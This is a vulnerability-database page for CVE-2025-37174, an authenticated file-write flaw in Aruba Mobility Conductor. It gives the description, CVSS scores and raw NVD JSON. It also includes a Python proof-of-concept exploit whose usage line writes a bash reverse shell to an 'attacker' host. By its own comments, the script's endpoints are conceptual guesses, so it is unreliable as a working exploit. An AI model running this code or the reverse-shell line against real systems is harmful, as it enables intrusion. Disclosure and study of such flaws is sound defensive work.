Security Vulnerability Report
中文
CVE-2025-37174 CVSS 7.2 HIGH

CVE-2025-37174

Published: 2026-01-13 20:16:05
Last Modified: 2026-01-23 16:38:13

Description

Authenticated arbitrary file write vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to create or modify arbitrary files and execute arbitrary commands as a privileged user on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:* - VULNERABLE
Aruba Mobility Conductor AOS-10 (版本 < 10.4.x)
Aruba Mobility Conductor AOS-8 (版本 < 8.11.x)
HPE Aruba 7200 Series Controllers (受影响)
HPE Aruba 7000 Series Controllers (受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-37174 PoC - HPE Aruba Mobility Conductor Authenticated Arbitrary File Write Note: This is a conceptual PoC for educational and security testing purposes only. """ import requests import sys import re from urllib.parse import urljoin def exploit_cve_2025_37174(target_url, username, password, target_file, malicious_content): """ Exploit for CVE-2025-37174: Authenticated arbitrary file write in Aruba Mobility Conductor Args: target_url: Base URL of the Aruba Mobility Conductor web interface username: Valid administrator username password: Administrator password target_file: Target file path to write (e.g., /etc/cron.d/malicious) malicious_content: Content to write to the target file Returns: bool: True if exploitation appears successful, False otherwise """ session = requests.Session() # Step 1: Authentication login_url = urljoin(target_url, '/v1/login') login_data = { 'username': username, 'password': password } try: login_response = session.post(login_url, json=login_data, verify=False, timeout=30) if login_response.status_code != 200: print(f"[-] Authentication failed with status code: {login_response.status_code}") return False print("[+] Successfully authenticated to Mobility Conductor") # Step 2: File Write Exploitation # The actual exploit would target specific endpoints that handle file operations # Common targets include configuration upload, firmware upload, or certificate management file_write_url = urljoin(target_url, '/v1/api/configuration/upload') # Construct malicious file write request # Note: The actual API structure would need to be reverse engineered from the target exploit_data = { 'filename': target_file, 'content': malicious_content, 'operation': 'write' } write_response = session.post(file_write_url, json=exploit_data, verify=False, timeout=30) if write_response.status_code == 200: print(f"[+] Successfully wrote to target file: {target_file}") # Step 3: Trigger execution (if applicable) # Depending on the file written, trigger its execution exec_url = urljoin(target_url, '/v1/api/system/reload') session.post(exec_url, json={'confirm': True}, verify=False, timeout=30) print("[+] File write exploit completed") return True else: print(f"[-] File write failed with status code: {write_response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {str(e)}") return False def main(): if len(sys.argv) < 6: print("Usage: python3 cve-2025-37174.py <target_url> <username> <password> <target_file> <content>") print("Example: python3 cve-2025-37174.py https://192.168.1.1 admin password /tmp/shell.sh 'bash -i >& /dev/tcp/attacker/4444 0>&1'") sys.exit(1) target_url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] target_file = sys.argv[4] malicious_content = sys.argv[5] print(f"[*] Targeting: {target_url}") print(f"[*] Target file: {target_file}") exploit_cve_2025_37174(target_url, username, password, target_file, malicious_content) if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37174", "sourceIdentifier": "[email protected]", "published": "2026-01-13T20:16:05.470", "lastModified": "2026-01-23T16:38:12.783", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authenticated arbitrary file write vulnerability exists in the web-based management interface of mobility conductors running either AOS-10 or AOS-8 operating systems. Successful exploitation could allow an authenticated malicious actor to create or modify arbitrary files and execute arbitrary commands as a privileged user on the underlying operating system."}, {"lang": "es", "value": "Vulnerabilidad de escritura arbitraria de archivos autenticada existe en la interfaz de gestión basada en web de los conductores de movilidad que ejecutan sistemas operativos AOS-10 o AOS-8. La explotación exitosa podría permitir a un actor malicioso autenticado crear o modificar archivos arbitrarios y ejecutar comandos arbitrarios como un usuario privilegiado en el sistema operativo subyacente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-277"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.5.4.0", "versionEndExcluding": "8.10.0.21", "matchCriteriaId": "187C0AB6-1290-4FE3-9FFE-7317DC57B931"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.11.0.0", "versionEndExcluding": "8.13.1.1", "matchCriteriaId": "1C7390DD-329B-44A3-9693-34211258DF37"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.3.0.0", "versionEndExcluding": "10.4.1.10", "matchCriteriaId": "93E77EBB-E46E-47E5-ADD2-1BD80257B08B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:arubanetworks:arubaos:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.5.0.0", "versionEndExcluding": "10.7.2.2", "matchCriteriaId": "48B3A810-4DD3-403E-9A76-AB86EF7EA9D1"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04987en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}